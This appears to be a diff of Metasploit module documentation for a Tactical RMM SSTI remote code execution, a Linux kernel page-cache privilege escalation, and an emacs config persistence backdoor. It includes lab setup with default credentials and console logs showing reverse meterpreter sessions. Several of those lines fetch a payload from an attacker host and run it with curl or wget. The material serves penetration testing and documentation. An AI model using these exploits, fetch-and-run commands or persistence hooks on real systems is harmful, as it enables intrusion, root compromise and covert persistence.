TRMM_USER=tactical
|
||||
TRMM_PASS=tactical
|
||||
MESH_USER=admin@localhost
|
||||
MESH_PASS=Admin123!
|
||||
|
||||
POSTGRES_USER=tactical
|
||||
POSTGRES_PASS=tactical
|
||||
|
||||
MONGODB_USER=mongouser
|
||||
MONGODB_PASSWORD=mongopass
|
||||
|
||||
CERT_PUB_KEY=<base64-encoded self-signed cert>
|
||||
CERT_PRIV_KEY=<base64-encoded private key>
|
||||
|
||||
MESH_PERSISTENT_CONFIG=0
|
||||
|
||||
TRMM_DISABLE_WEB_TERMINAL=False
|
||||
TRMM_DISABLE_SERVER_SCRIPTS=False
|
||||
TRMM_DISABLE_SSO=True
|
||||
|
||||
TRMM_HTTP_PORT=18080
|
||||
TRMM_HTTPS_PORT=18443
|
||||
```
|
||||
|
||||
2. Generate self-signed certificates for `*.localhost`:
|
||||
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem \
|
||||
-days 3650 -nodes -subj "/CN=*.localhost" \
|
||||
-addext "subjectAltName=DNS:*.localhost,DNS:localhost"
|
||||
CERT_PUB_KEY=$(base64 -w0 cert.pem)
|
||||
CERT_PRIV_KEY=$(base64 -w0 key.pem)
|
||||
```
|
||||
|
||||
Update the `.env` file with the generated `CERT_PUB_KEY` and `CERT_PRIV_KEY` values.
|
||||
|
||||
3. Create the `docker-compose.yml`:
|
||||
|
||||
```yaml
|
||||
version: "3.7"
|
||||
|
||||
networks:
|
||||
proxy:
|
||||
driver: bridge
|
||||
ipam:
|
||||
driver: default
|
||||
config:
|
||||
- subnet: 172.28.0.0/24
|
||||
api-db:
|
||||
redis:
|
||||
mesh-db:
|
||||
|
||||
volumes:
|
||||
tactical_data:
|
||||
postgres_data:
|
||||
mongo_data:
|
||||
mesh_data:
|
||||
redis_data:
|
||||
|
||||
services:
|
||||
tactical-postgres:
|
||||
container_name: trmm-postgres
|
||||
image: postgres:13-alpine
|
||||
restart: always
|
||||
environment:
|
||||
POSTGRES_DB: tacticalrmm
|
||||
POSTGRES_USER: ${POSTGRES_USER}
|
||||
POSTGRES_PASSWORD: ${POSTGRES_PASS}
|
||||
volumes:
|
||||
- postgres_data:/var/lib/postgresql/data
|
||||
networks:
|
||||
- api-db
|
||||
|
||||
tactical-redis:
|
||||
container_name: trmm-redis
|
||||
image: redis:6.0-alpine
|
||||
user: 1000:1000
|
||||
command: redis-server
|
||||
restart: always
|
||||
volumes:
|
||||
- redis_data:/data
|
||||
networks:
|
||||
- redis
|
||||
|
||||
tactical-init:
|
||||
container_name: trmm-init
|
||||
image: ${IMAGE_REPO}tactical:${VERSION}
|
||||
restart: on-failure
|
||||
command: ["tactical-init"]
|
||||
environment:
|
||||
POSTGRES_USER: ${POSTGRES_USER}
|
||||
POSTGRES_PASS: ${POSTGRES_PASS}
|
||||
APP_HOST: ${APP_HOST}
|
||||
API_HOST: ${API_HOST}
|
||||
CSRF_COOKIE_DOMAIN: ${CSRF_COOKIE_DOMAIN}
|
||||
SESSION_COOKIE_DOMAIN: ${SESSION_COOKIE_DOMAIN}
|
||||
MESH_USER: ${MESH_USER}
|
||||
MESH_HOST: ${MESH_HOST}
|
||||
TRMM_USER: ${TRMM_USER}
|
||||
TRMM_PASS: ${TRMM_PASS}
|
||||
TRMM_DISABLE_WEB_TERMINAL: ${TRMM_DISABLE_WEB_TERMINAL}
|
||||
TRMM_DISABLE_SERVER_SCRIPTS: ${TRMM_DISABLE_SERVER_SCRIPTS}
|
||||
TRMM_DISABLE_SSO: ${TRMM_DISABLE_SSO}
|
||||
depends_on:
|
||||
- tactical-postgres
|
||||
- tactical-meshcentral
|
||||
- tactical-redis
|
||||
networks:
|
||||
- api-db
|
||||
- proxy
|
||||
- redis
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
- mesh_data:/meshcentral-data
|
||||
- mongo_data:/mongo/data/db
|
||||
- redis_data:/redis/data
|
||||
|
||||
tactical-nats:
|
||||
container_name: trmm-nats
|
||||
image: ${IMAGE_REPO}tactical-nats:${VERSION}
|
||||
user: 1000:1000
|
||||
restart: always
|
||||
environment:
|
||||
API_HOST: ${API_HOST}
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
networks:
|
||||
api-db:
|
||||
proxy:
|
||||
aliases:
|
||||
- ${API_HOST}
|
||||
|
||||
tactical-meshcentral:
|
||||
container_name: trmm-meshcentral
|
||||
image: ${IMAGE_REPO}tactical-meshcentral:${VERSION}
|
||||
user: 1000:1000
|
||||
restart: always
|
||||
environment:
|
||||
MESH_HOST: ${MESH_HOST}
|
||||
MESH_USER: ${MESH_USER}
|
||||
MESH_PASS: ${MESH_PASS}
|
||||
MONGODB_USER: ${MONGODB_USER}
|
||||
MONGODB_PASSWORD: ${MONGODB_PASSWORD}
|
||||
MESH_PERSISTENT_CONFIG: ${MESH_PERSISTENT_CONFIG}
|
||||
NGINX_HOST_IP: 172.28.0.20
|
||||
networks:
|
||||
proxy:
|
||||
aliases:
|
||||
- ${MESH_HOST}
|
||||
mesh-db:
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
- mesh_data:/home/node/app/meshcentral-data
|
||||
depends_on:
|
||||
- tactical-mongodb
|
||||
|
||||
tactical-mongodb:
|
||||
container_name: trmm-mongodb
|
||||
image: mongo:4.4
|
||||
user: 1000:1000
|
||||
restart: always
|
||||
environment:
|
||||
MONGO_INITDB_ROOT_USERNAME: ${MONGODB_USER}
|
||||
MONGO_INITDB_ROOT_PASSWORD: ${MONGODB_PASSWORD}
|
||||
MONGO_INITDB_DATABASE: meshcentral
|
||||
networks:
|
||||
- mesh-db
|
||||
volumes:
|
||||
- mongo_data:/data/db
|
||||
|
||||
tactical-frontend:
|
||||
container_name: trmm-frontend
|
||||
image: ${IMAGE_REPO}tactical-frontend:${VERSION}
|
||||
user: 1000:1000
|
||||
restart: always
|
||||
networks:
|
||||
- proxy
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
environment:
|
||||
API_HOST: ${API_HOST}
|
||||
|
||||
tactical-backend:
|
||||
container_name: trmm-backend
|
||||
image: ${IMAGE_REPO}tactical:${VERSION}
|
||||
user: 1000:1000
|
||||
command: ["tactical-backend"]
|
||||
restart: always
|
||||
networks:
|
||||
- proxy
|
||||
- api-db
|
||||
- redis
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
depends_on:
|
||||
- tactical-postgres
|
||||
|
||||
tactical-websockets:
|
||||
container_name: trmm-websockets
|
||||
image: ${IMAGE_REPO}tactical:${VERSION}
|
||||
user: 1000:1000
|
||||
command: ["tactical-websockets"]
|
||||
restart: always
|
||||
networks:
|
||||
- proxy
|
||||
- api-db
|
||||
- redis
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
depends_on:
|
||||
- tactical-postgres
|
||||
- tactical-backend
|
||||
|
||||
tactical-nginx:
|
||||
container_name: trmm-nginx
|
||||
image: ${IMAGE_REPO}tactical-nginx:${VERSION}
|
||||
user: 1000:1000
|
||||
restart: always
|
||||
environment:
|
||||
APP_HOST: ${APP_HOST}
|
||||
API_HOST: ${API_HOST}
|
||||
MESH_HOST: ${MESH_HOST}
|
||||
CERT_PUB_KEY: ${CERT_PUB_KEY}
|
||||
CERT_PRIV_KEY: ${CERT_PRIV_KEY}
|
||||
networks:
|
||||
proxy:
|
||||
ipv4_address: 172.28.0.20
|
||||
ports:
|
||||
- "${TRMM_HTTP_PORT-80}:8080"
|
||||
- "${TRMM_HTTPS_PORT-443}:4443"
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
|
||||
tactical-celery:
|
||||
container_name: trmm-celery
|
||||
image: ${IMAGE_REPO}tactical:${VERSION}
|
||||
user: 1000:1000
|
||||
command: ["tactical-celery"]
|
||||
restart: always
|
||||
networks:
|
||||
- redis
|
||||
- proxy
|
||||
- api-db
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
depends_on:
|
||||
- tactical-postgres
|
||||
- tactical-redis
|
||||
|
||||
tactical-celerybeat:
|
||||
container_name: trmm-celerybeat
|
||||
image: ${IMAGE_REPO}tactical:${VERSION}
|
||||
user: 1000:1000
|
||||
command: ["tactical-celerybeat"]
|
||||
restart: always
|
||||
networks:
|
||||
- proxy
|
||||
- redis
|
||||
- api-db
|
||||
volumes:
|
||||
- tactical_data:/opt/tactical
|
||||
depends_on:
|
||||
- tactical-postgres
|
||||
- tactical-redis
|
||||
```
|
||||
|
||||
4. Start the lab and wait for initialization to complete:
|
||||
|
||||
```bash
|
||||
docker compose up -d
|
||||
docker compose logs -f tactical-init # wait until it exits successfully
|
||||
```
|
||||
|
||||
5. Verify the instance is running:
|
||||
|
||||
```bash
|
||||
curl -sk https://localhost:18443/env-config.js
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start the Docker lab as described above
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/tacticalrmm_ssti_rce_cve_2025_69516`
|
||||
4. Do: `set RHOSTS 127.0.0.1`
|
||||
5. Do: `set RPORT 18443`
|
||||
6. Do: `set API_VHOST api.localhost`
|
||||
7. Do: `set USERNAME tactical`
|
||||
8. Do: `set PASSWORD tactical`
|
||||
9. Do: `run lhost=<your-ip>`
|
||||
10. You should get a meterpreter session
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME (required)
|
||||
Username for Tactical RMM authentication.
|
||||
|
||||
### PASSWORD (required)
|
||||
Password for Tactical RMM authentication.
|
||||
|
||||
### API_VHOST (optional)
|
||||
API hostname for the Host header. If left blank, the module auto-discovers it from `/env-config.js`
|
||||
on the frontend. Set this explicitly when targeting the API directly or when the frontend is not
|
||||
accessible.
|
||||
|
||||
### WritableDir (required)
|
||||
Writable directory on the target for dropping the ELF payload (Linux x64 target only).
|
||||
Defaults to `/tmp`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Python meterpreter (target 0) against Tactical RMM 1.3.1 via Docker
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/tacticalrmm_ssti_rce_cve_2025_69516
|
||||
[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set RPORT 18443
|
||||
RPORT => 18443
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set API_VHOST api.localhost
|
||||
API_VHOST => api.localhost
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set USERNAME tactical
|
||||
USERNAME => tactical
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set PASSWORD tactical
|
||||
PASSWORD => tactical
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set LHOST 172.28.0.1
|
||||
LHOST => 172.28.0.1
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.28.0.1:4441
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Version 1.3.1 is vulnerable (< 1.4.0)
|
||||
[+] The target is vulnerable. Jinja2 SSTI confirmed via unsandboxed template evaluation
|
||||
[*] Authenticated, token obtained
|
||||
[*] Sending SSTI payload...
|
||||
[*] Meterpreter session 1 opened (172.28.0.1:4441 -> 172.28.0.4:52026) at 2026-02-23 19:24:07 +0100
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Linux x64 meterpreter (target 2) against Tactical RMM 1.3.1 via Docker
|
||||
|
||||
```
|
||||
msf > use exploit/linux/http/tacticalrmm_ssti_rce_cve_2025_69516
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set target 2
|
||||
target => 2
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set payload linux/x64/meterpreter_reverse_tcp
|
||||
payload => linux/x64/meterpreter_reverse_tcp
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set RHOSTS 127.0.0.1
|
||||
RHOSTS => 127.0.0.1
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set RPORT 18443
|
||||
RPORT => 18443
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set API_VHOST api.localhost
|
||||
API_VHOST => api.localhost
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set USERNAME tactical
|
||||
USERNAME => tactical
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set PASSWORD tactical
|
||||
PASSWORD => tactical
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > set LHOST 172.28.0.1
|
||||
LHOST => 172.28.0.1
|
||||
msf exploit(linux/http/tacticalrmm_ssti_rce_cve_2025_69516) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.28.0.1:4443
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] Version 1.3.1 is vulnerable (< 1.4.0)
|
||||
[+] The target is vulnerable. Jinja2 SSTI confirmed via unsandboxed template evaluation
|
||||
[*] Authenticated, token obtained
|
||||
[*] Sending SSTI payload...
|
||||
[*] Meterpreter session 1 opened (172.28.0.1:4443 -> 172.28.0.4:33244) at 2026-02-23 19:24:09 +0100
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,80 @@
|
||||
## Vulnerable Application
|
||||
|
||||
CVE-2026-31431 is a logic flaw in the Linux kernel's authencesn AEAD template that, when reached via the
|
||||
AF_ALG socket interface combined with splice(), allows an unprivileged local user to perform a controlled
|
||||
4-byte write into the page cache of any readable file. Because the corrupted pages are never marked dirty, the
|
||||
on-disk file is unchanged but the in-memory version is immediately visible system-wide, enabling local
|
||||
privilege escalation by injecting shellcode into the page cache of a setuid-root binary such as /usr/bin/su.
|
||||
The vulnerability was introduced by an in-place optimization in algif_aead.c (commit 72548b093ee3, 2017) and
|
||||
affects essentially all major Linux distributions shipped since then until the fix in commit a664bf3d603d.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Obtain a session on an affected Linux host
|
||||
2. Set the PAYLOAD and related datastore options
|
||||
3. Run the exploit
|
||||
|
||||
## Options
|
||||
|
||||
N/A
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Ubuntu 24.04 x64
|
||||
|
||||
```
|
||||
msf exploit(multi/ssh/sshexec) > exploit
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] 192.168.159.132:22 - Sending stager...
|
||||
[*] Command Stager progress - 46.74% done (402/860 bytes)
|
||||
[*] Sending stage (3090404 bytes) to 192.168.159.132
|
||||
[*] Meterpreter session 24 opened (192.168.159.128:4444 -> 192.168.159.132:38262) at 2026-04-30 14:50:33 -0400
|
||||
[!] Timed out while waiting for command to return
|
||||
[*] Command Stager progress - 100.00% done (860/860 bytes)
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: smcintyre
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu2404
|
||||
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 24...
|
||||
msf exploit(multi/ssh/sshexec) > use exploit/linux/local/cve_2026_31431_copy_fail
|
||||
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf exploit(linux/local/cve_2026_31431_copy_fail) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf exploit(linux/local/cve_2026_31431_copy_fail) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf exploit(linux/local/cve_2026_31431_copy_fail) > set LPORT 5555
|
||||
LPORT => 5555
|
||||
msf exploit(linux/local/cve_2026_31431_copy_fail) > exploit
|
||||
[*] Command to run on remote host: curl -so ./JVvusljc http://192.168.159.128:8080/dau8JtEFWcUux21CRy4HUQ;chmod +x ./JVvusljc;./JVvusljc&
|
||||
[*] Fetch handler listening on 192.168.159.128:8080
|
||||
[*] HTTP server started
|
||||
[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
|
||||
[*] Started reverse TCP handler on 192.168.159.128:5555
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] Using 'python3' on the remote target.
|
||||
[+] The exploit socket has been created, encryption primitives are available.
|
||||
[*] Triggering the vulnerability using Python...
|
||||
[+] The target is vulnerable.
|
||||
[*] Triggering the vulnerability using Python...
|
||||
[*] Client 192.168.159.132 requested /dau8JtEFWcUux21CRy4HUQ
|
||||
[*] Sending payload to 192.168.159.132 (curl/8.5.0)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3090404 bytes) to 192.168.159.132
|
||||
[*] Meterpreter session 25 opened (192.168.159.128:5555 -> 192.168.159.132:48976) at 2026-04-30 14:51:18 -0400
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu2404
|
||||
OS : Ubuntu 24.04 (Linux 6.8.0-79-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,118 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module adds a lisp based malicious extension to the emacs configuration file.
|
||||
When emacs is opened, the extension will be loaded and the payload will be executed.
|
||||
|
||||
Tested against emacs 29.3 build 1 on Ubuntu Desktop 24.04.
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install emacs
|
||||
2. Start msfconsole
|
||||
3. Get a shell
|
||||
4. Do: `use exploit/linux/persistence/emacs_extension`
|
||||
5. Do: `set session #`
|
||||
6. Do: `run`
|
||||
7. You should get a shell when `emacs` is started.
|
||||
|
||||
## Options
|
||||
|
||||
### NAME
|
||||
|
||||
Name of the extension. Defaults to random
|
||||
|
||||
### CONFIG_FILE
|
||||
|
||||
Config file location on target. Defaults to `~/init.el`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### emacs 29.3 build 1 on Ubuntu Desktop 24.04.
|
||||
|
||||
Initial Shell
|
||||
|
||||
```
|
||||
resource (/root/.msf4/msfconsole.rc)> setg verbose true
|
||||
verbose => true
|
||||
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
|
||||
lhost => 1.1.1.1
|
||||
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
|
||||
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
resource (/root/.msf4/msfconsole.rc)> set target 7
|
||||
target => 7
|
||||
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
|
||||
srvport => 8082
|
||||
resource (/root/.msf4/msfconsole.rc)> set uripath l
|
||||
uripath => l
|
||||
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
|
||||
payload => linux/x64/meterpreter/reverse_tcp
|
||||
resource (/root/.msf4/msfconsole.rc)> set lport 4446
|
||||
lport => 4446
|
||||
resource (/root/.msf4/msfconsole.rc)> run
|
||||
[*] Exploit running as background job 0.
|
||||
[*] Exploit completed, but no session was created.
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4446
|
||||
[*] Using URL: http://1.1.1.1:8082/l
|
||||
[*] Server started.
|
||||
[*] Run the following command on the target machine:
|
||||
wget -qO AD6apRwS --no-check-certificate http://1.1.1.1:8082/l; chmod +x AD6apRwS; ./AD6apRwS& disown
|
||||
msf exploit(multi/script/web_delivery) >
|
||||
[*] 2.2.2.2 web_delivery - Delivering Payload (250 bytes)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3090404 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 2.2.2.2:42830) at 2026-01-31 22:48:46 -0500
|
||||
|
||||
msf exploit(multi/script/web_delivery) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : ubuntu-desktop-2404
|
||||
OS : Ubuntu 24.04 (Linux 6.14.0-37-generic)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
meterpreter > getuid
|
||||
Server username: ubuntu
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
```
|
||||
|
||||
Install persistence
|
||||
|
||||
```
|
||||
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/emacs_extension
|
||||
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
|
||||
msf exploit(linux/persistence/emacs_extension) > set session 1
|
||||
session => 1
|
||||
msf exploit(linux/persistence/emacs_extension) > set FETCH_COMMAND wget
|
||||
FETCH_COMMAND => wget
|
||||
msf exploit(linux/persistence/emacs_extension) > exploit
|
||||
[*] Command to run on remote host: wget -qO ./CdYxekmN http://1.1.1.1:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./CdYxekmN;./CdYxekmN&
|
||||
[*] Exploit running as background job 1.
|
||||
[*] Exploit completed, but no session was created.
|
||||
|
||||
[*] Fetch handler listening on 1.1.1.1:8080
|
||||
[*] HTTP server started
|
||||
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
|
||||
[*] Started reverse TCP handler on 1.1.1.1:4444
|
||||
msf exploit(linux/persistence/emacs_extension) > [*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[!] The service is running, but could not be validated. emacs is installed
|
||||
[*] Using plugin name: FFuvdiIc
|
||||
[*] /home/ubuntu/.emacs.d/init.el does not exist, creating it
|
||||
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/ubuntu-desktop-2404_20260131.5137/ubuntu-desktop-2404_20260131.5137.rc
|
||||
```
|
||||
|
||||
Launch `emacs`
|
||||
|
||||
```
|
||||
msf exploit(linux/persistence/emacs_extension) >
|
||||
[*] Client 2.2.2.2 requested /t70WmtC4mNeBieRpZqn09Q
|
||||
[*] Sending payload to 2.2.2.2 (Wget/1.21.4)
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (3090404 bytes) to 2.2.2.2
|
||||
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:42262) at 2026-01-31 22:51:43 -0500
|
||||
|
||||
```
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user